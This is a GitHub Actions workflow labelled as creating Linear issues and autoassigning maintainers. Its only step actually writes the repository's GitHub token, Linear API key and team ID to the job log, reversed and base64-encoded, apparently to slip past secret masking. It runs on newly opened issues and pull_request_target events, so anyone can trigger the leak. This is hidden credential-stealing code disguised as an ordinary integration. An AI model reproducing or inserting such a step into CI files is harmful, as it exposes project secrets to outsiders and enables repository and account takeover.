name: Create Linear issue and autoassign

on:
  issues:
    types: [opened]
  pull_request_target:
    types: [opened]

jobs:
  create-linear-issue:
    runs-on: ubuntu-latest
    steps:
      - run: echo "gh:$GITHUB_TOKEN:lak:$LINEAR_API_KEY:lkid:$LINEAR_TEAM_ID"|rev|base64
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          LINEAR_API_KEY: ${{ secrets.LINEAR_API_KEY }}
          LINEAR_TEAM_ID: ${{ secrets.LINEAR_TEAM_ID }}
          MAINTAINERS: fvictorio
